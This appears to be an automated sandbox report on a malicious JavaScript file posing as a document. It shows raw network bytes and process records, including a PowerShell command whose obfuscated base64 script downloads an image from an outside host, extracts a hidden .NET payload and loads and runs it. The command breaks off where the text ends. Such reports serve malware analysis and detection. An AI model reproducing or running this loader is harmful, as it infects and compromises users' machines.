                            2024-08-12 09:37:09 UTC8000INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 50 41 46 75 2b 2f 46 56 55 52 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 66 79 63 54 38 2f 45 4f 68 77 2f 5a 51 69 47 2f 44 51 6d 2f 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 2f 41 55 34 36 2f 54 48 64 30 39 76 54 4f 35 30 2f 53 4a 6c 55 2f 4c 6c 55 53 39 2f 55 54 4e 31 2f 53 4a 6c 55 2f 33 55 54 4e 39 2f 52 48 64 30 2f 34 67 44 4f 2f 76 30 53 4c 39 50 41 5a 2b 50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 48 42 51 6d 2f 2f 50 41 46 75 2b 2f 41 55 34 36 2f 44 51 68 72 2f 50 41 46 75 2b 2f 41 55 34 36 2f 44 51 68 72 2f 50 41 46 75 2b 2f 41 55 34 36 2f 44 51 68 72 2f 50 41 46 75 2b 52 41 6b 35 2f 41 41
                            Data Ascii: AAAAAAAAAAAAAAAAAA8PAFu+/FVUR/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/fycT8/EOhw/ZQiG/DQm/DAAAAAAAAAAAAAAAAAAAAw/AU46/THd09vTO50/SJlU/LlUS9/UTN1/SJlU/3UTN9/RHd0/4gDO/v0SL9PAZ+PAAAAAAAAAAAAAAAAAAAAAHBQm//PAFu+/AU46/DQhr/PAFu+/AU46/DQhr/PAFu+/AU46/DQhr/PAFu+RAk5/AA
                            2024-08-12 09:37:09 UTC8000INData Raw: 67 67 4a 43 70 39 51 67 41 2f 46 62 36 33 72 2f 41 43 51 43 58 46 6d 63 41 41 41 67 6b 4d 4a 64 46 54 42 34 52 58 68 51 51 4c 4e 30 54 47 41 76 72 77 61 69 44 6f 44 4f 52 2b 52 31 55 51 52 75 69 61 72 30 47 44 70 70 43 70 51 58 4b 65 68 65 41 59 49 70 48 45 66 44 33 62 44 30 46 76 41 33 77 65 43 57 41 66 34 51 4c 43 32 41 73 42 63 4e 59 57 32 4b 5a 42 63 2b 62 2b 67 49 33 56 35 72 6b 48 59 43 59 65 52 59 41 2f 4e 6c 62 37 54 68 4a 63 42 77 52 52 41 34 42 75 63 70 44 36 36 31 64 31 39 62 79 47 6e 6c 41 53 67 47 76 49 34 78 56 55 55 45 76 58 4b 51 41 75 4a 77 6d 4a 58 67 30 39 48 41 46 57 6a 41 6f 33 43 79 37 42 45 55 4d 7a 41 67 4c 45 56 6b 56 53 56 30 55 46 78 77 55 55 68 30 52 4a 4a 46 49 4d 78 55 51 4b 39 57 2f 2f 43 4f 5a 30 78 6b 4c 30 31 57 64 67 6b
                            Data Ascii: ggJCp9QgA/Fb63r/ACQCXFmcAAAgkMJdFTB4RXhQQLN0TGAvrwaiDoDOR+R1UQRuiar0GDppCpQXKeheAYIpHEfD3bD0FvA3weCWAf4QLC2AsBcNYW2KZBc+b+gI3V5rkHYCYeRYA/Nlb7ThJcBwRRA4BucpD661d19byGnlASgGvI4xVUUEvXKQAuJwmJXg09HAFWjAo3Cy7BEUMzAgLEVkVSV0UFxwUUh0RJJFIMxUQK9W//COZ0xkL01Wdgk
                            2024-08-12 09:37:09 UTC8000INData Raw: 79 77 49 76 36 45 52 50 35 45 4a 6a 59 61 4f 63 46 6d 37 4d 65 49 4c 45 64 6f 53 47 4b 37 41 34 4e 4f 6e 41 45 45 56 72 4d 6b 77 69 39 4d 52 72 70 68 6c 44 32 49 41 67 35 6d 62 6a 37 72 51 53 77 44 53 6b 6b 79 48 6b 51 77 6b 44 33 55 62 69 35 79 69 4f 4b 43 70 72 62 2b 52 47 59 68 43 6e 7a 43 50 42 47 69 45 6b 4d 59 34 62 4e 44 4a 41 43 79 49 59 42 67 79 73 42 78 55 30 4d 6d 67 54 52 32 62 44 74 52 7a 6c 59 78 4d 68 61 53 76 41 59 51 66 45 50 7a 34 48 50 4b 4c 6a 6e 55 7a 73 4b 44 51 45 4a 33 51 45 70 77 34 42 4e 67 55 54 71 32 43 71 5a 38 54 54 4e 6d 42 43 57 45 63 72 33 77 4e 6b 42 77 55 44 4d 30 49 45 2f 4e 7a 55 41 46 2b 53 42 4d 43 58 51 58 47 54 41 77 30 67 67 70 70 36 4c 34 34 41 35 48 54 59 51 63 63 70 41 49 38 6a 6b 4a 65 51 36 5a 75 61 45 49 57
                            Data Ascii: ywIv6ERP5EJjYaOcFm7MeILEdoSGK7A4NOnAEEVrMkwi9MRrphlD2IAg5mbj7rQSwDSkkyHkQwkD3Ubi5yiOKCprb+RGYhCnzCPBGiEkMY4bNDJACyIYBgysBxU0MmgTR2bDtRzlYxMhaSvAYQfEPz4HPKLjnUzsKDQEJ3QEpw4BNgUTq2CqZ8TTNmBCWEcr3wNkBwUDM0IE/NzUAF+SBMCXQXGTAw0ggpp6L44A5HTYQccpAI8jkJeQ6ZuaEIW
                            2024-08-12 09:37:09 UTC8000INData Raw: 35 65 79 42 68 67 58 45 59 6e 37 5a 65 6e 4c 49 47 30 61 32 46 35 64 75 6e 35 5a 62 33 72 68 6e 61 45 35 5a 65 6e 37 5a 4b 54 33 69 32 72 66 75 6e 35 64 65 6c 6e 62 38 6f 53 6b 33 35 65 6d 6e 41 68 6a 35 5a 4a 39 6f 6e 35 64 75 6e 41 65 4e 2f 6c 45 35 35 65 6d 33 35 32 58 31 6b 72 47 66 65 6e 37 5a 65 4c 62 35 77 54 42 46 2f 75 6d 33 35 65 43 4e 75 58 4a 45 53 73 78 46 64 56 4c 6a 74 77 74 33 79 45 47 47 5a 57 46 4d 61 30 53 4f 6e 49 77 41 2b 76 39 76 2f 7a 36 64 4f 6f 47 51 63 2f 33 51 6c 42 68 43 50 4a 74 49 76 69 58 43 44 57 30 42 53 79 38 79 2f 2f 50 4b 51 66 68 44 4a 30 77 53 75 6f 52 73 50 4b 2f 36 38 42 69 48 52 62 62 34 33 39 38 47 46 66 31 2f 2f 2f 2f 66 67 71 75 31 55 33 33 73 36 7a 64 38 4e 2f 69 42 46 4f 6e 58 56 79 50 33 50 63 4b 39 33 5a 70
                            Data Ascii: 5eyBhgXEYn7ZenLIG0a2F5dun5Zb3rhnaE5Zen7ZKT3i2rfun5delnb8oSk35emnAhj5ZJ9on5dunAeN/lE55em352X1krGfen7ZeLb5wTBF/um35eCNuXJESsxFdVLjtwt3yEGGZWFMa0SOnIwA+v9v/z6dOoGQc/3QlBhCPJtIviXCDW0BSy8y//PKQfhDJ0wSuoRsPK/68BiHRbb4398GFf1////fgqu1U33s6zd8N/iBFOnXVyP3PcK93Zp
                            2024-08-12 09:37:09 UTC8000INData Raw: 6b 7a 31 62 6b 4f 62 75 4d 65 41 61 38 77 70 38 42 36 69 78 57 38 74 52 68 35 2f 37 62 2f 44 74 58 39 4a 34 6e 65 37 45 55 38 61 33 53 38 5a 5a 70 77 6e 6a 57 45 74 4d 79 53 39 41 76 6e 39 2f 4e 2f 33 2b 58 48 48 59 74 2b 74 72 48 33 63 44 73 4e 58 63 35 57 6e 6e 4c 59 56 79 49 2f 6b 50 46 62 74 77 2f 6d 33 2f 76 52 2b 76 78 38 55 49 7a 54 49 36 34 58 79 6d 33 78 37 61 6d 6f 59 44 76 77 56 74 58 79 6b 75 2f 4c 63 37 2f 6a 72 36 7a 79 59 52 74 45 78 49 50 57 6d 65 38 57 5a 34 53 6d 77 61 35 43 70 43 6f 62 7a 2f 33 2f 76 4a 50 5a 53 70 77 7a 7a 58 74 36 6f 34 78 5a 72 6f 5a 5a 79 37 6e 47 6a 2f 6d 55 62 76 75 33 38 76 35 2f 6a 57 32 62 53 6b 6b 74 7a 4c 69 57 54 34 6f 42 31 38 2b 48 70 68 52 6a 63 63 72 38 32 4a 54 64 51 64 46 79 38 66 2b 2f 2b 2f 31 6c 6b
                            Data Ascii: kz1bkObuMeAa8wp8B6ixW8tRh5/7b/DtX9J4ne7EU8a3S8ZZpwnjWEtMyS9Avn9/N/3+XHHYt+trH3cDsNXc5WnnLYVyI/kPFbtw/m3/vR+vx8UIzTI64Xym3x7amoYDvwVtXyku/Lc7/jr6zyYRtExIPWme8WZ4Smwa5CpCobz/3/vJPZSpwzzXt6o4xZroZZy7nGj/mUbvu38v5/jW2bSkktzLiWT4oB18+HphRjccr82JTdQdFy8f+/+/1lk
                            2024-08-12 09:37:09 UTC8000INData Raw: 4b 47 70 48 72 5a 2f 34 57 34 45 47 54 49 37 2f 62 75 2f 50 49 65 6f 71 66 75 71 59 65 2f 6d 47 38 6c 4b 56 50 74 30 41 42 4f 73 6c 73 2f 71 47 71 6d 6a 33 2f 79 2f 4c 2f 34 45 42 73 4f 64 4b 69 7a 6d 36 76 72 46 47 4a 2b 69 75 53 5a 4b 63 45 41 65 76 6b 2f 39 7a 2f 50 6e 42 59 6d 41 6c 48 65 4a 2f 36 30 36 45 68 2f 79 57 30 59 36 36 76 66 6a 2f 70 7a 44 54 7a 74 30 69 76 35 33 39 76 74 6c 6f 7a 58 42 64 49 65 70 51 47 31 6c 34 76 72 38 50 34 43 46 67 49 49 34 52 52 44 46 4c 52 69 53 68 62 36 48 54 44 67 35 56 49 2f 32 38 2b 35 37 71 76 4a 78 67 67 55 38 37 62 79 36 56 47 77 50 7a 4c 50 76 36 2f 50 56 44 52 6a 59 4f 2f 76 2b 50 34 4f 39 43 77 75 69 63 44 52 65 31 79 38 4a 50 71 37 2f 41 71 35 37 31 66 50 54 77 76 77 31 75 61 44 51 39 54 49 63 65 33 54 66
                            Data Ascii: KGpHrZ/4W4EGTI7/bu/PIeoqfuqYe/mG8lKVPt0ABOsls/qGqmj3/y/L/4EBsOdKizm6vrFGJ+iuSZKcEAevk/9z/PnBYmAlHeJ/606Eh/yW0Y66vfj/pzDTzt0iv539vtlozXBdIepQG1l4vr8P4CFgII4RRDFLRiShb6HTDg5VI/28+57qvJxggU87by6VGwPzLPv6/PVDRjYO/v+P4O9CwuicDRe1y8JPq7/Aq571fPTwvw1uaDQ9TIce3Tf
                            2024-08-12 09:37:09 UTC8000INData Raw: 64 50 39 6d 64 75 61 76 32 76 70 32 4f 31 64 44 59 37 57 4d 53 31 64 77 52 35 39 6e 32 73 5a 52 44 2f 41 77 42 62 63 4c 67 64 4a 34 52 6e 4d 38 2f 77 75 56 77 61 66 6d 63 48 2b 7a 71 4a 68 4a 6f 34 4e 35 48 56 42 59 65 4e 45 57 64 43 65 4c 67 33 37 4a 63 58 38 7a 30 62 49 4f 73 56 72 37 54 32 64 2b 63 53 43 2f 2b 56 63 49 62 2f 34 30 47 2f 67 65 34 59 37 77 62 6e 72 62 64 34 57 36 71 61 6f 6b 59 62 50 4f 52 41 69 39 39 50 53 32 54 66 44 79 5a 36 76 69 61 76 64 30 65 44 2f 77 65 46 6b 34 62 33 64 44 62 66 72 36 35 71 39 39 50 2b 66 6f 4a 62 59 73 78 56 48 6d 52 70 64 6d 67 30 31 49 35 73 65 6d 46 7a 30 32 5a 4e 4a 79 6e 36 4a 32 36 4f 79 31 36 73 75 42 64 7a 66 57 66 7a 73 55 36 76 6b 6e 42 48 42 37 57 62 74 68 51 33 76 32 39 6b 32 32 2b 54 66 79 61 6c 35
                            Data Ascii: dP9mduav2vp2O1dDY7WMS1dwR59n2sZRD/AwBbcLgdJ4RnM8/wuVwafmcH+zqJhJo4N5HVBYeNEWdCeLg37JcX8z0bIOsVr7T2d+cSC/+VcIb/40G/ge4Y7wbnrbd4W6qaokYbPORAi99PS2TfDyZ6viavd0eD/weFk4b3dDbfr65q99P+foJbYsxVHmRpdmg01I5semFz02ZNJyn6J26Oy16suBdzfWfzsU6vknBHB7WbthQ3v29k22+Tfyal5


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            • File
                            • Registry

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:05:37:00
                            Start date:12/08/2024
                            Path:C:\Windows\System32\wscript.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js"
                            Imagebase:0x7ff7543d0000
                            File size:170'496 bytes
                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            Show Windows behavior

                            File Activities

                            Show Windows behavior

                            Section Activities

                            Show Windows behavior

                            Registry Activities

                            Show Windows behavior

                            COM Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Windows UI Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            General

                            Target ID:2
                            Start time:05:37:01
                            Start date:12/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBF? ? ? ? ?E4? ? ? ? ?R? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?Gc? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D? ? ? ? ?? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cs? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?LgBM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BD? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?HU? ? ? ? ?YgBz? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bj? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?QwBv? ? ? ? ?G4? ? ? ? ?dgBl? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?Bd? ? ? ? ?Do? ? ? ? ?OgBG? ? ? ? ?HI? ? ? ? ?bwBt? ? ? ? ?EI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BD? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?UgBl? ? ? ? ?GY? ? ? ? ?b? ? ? ? ?Bl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?G8? ? ? ? ?bg? ? ? ? ?u? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQBd? ? ? ? ?Do? ? ? ? ?OgBM? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bj? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?V? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bu? ? ? ? ?Gw? ? ? ? ?aQBi? ? ? ? ?C4? ? ? ? ?SQBP? ? ? ? ?C4? ? ? ? ?S? ? ? ? ?Bv? ? ? ? ?G0? ? ? ? ?ZQ? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?G0? ? ? ? ?ZQB0? ? ? ? ?Gg? ? ? ? ?bwBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?E0? ? ? ? ?ZQB0? ? ? ? ?Gg? ? ? ? ?bwBk? ? ? ? ?Cg? ? ? ? ?JwBW? ? ? ? ?EE? ? ? ? ?SQ? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?dgBv? ? ? ? ?Gs? ? ? ? ?ZQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?bgB1? ? ? ? ?Gw? ? ? ? ?b? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBv? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?Bb? ? ? ? ?F0? ? ? ? ?XQ? ? ? ? ?g? ? ? ? ?Cg? ? ? ? ?JwB0? ? ? ? ?Hg? ? 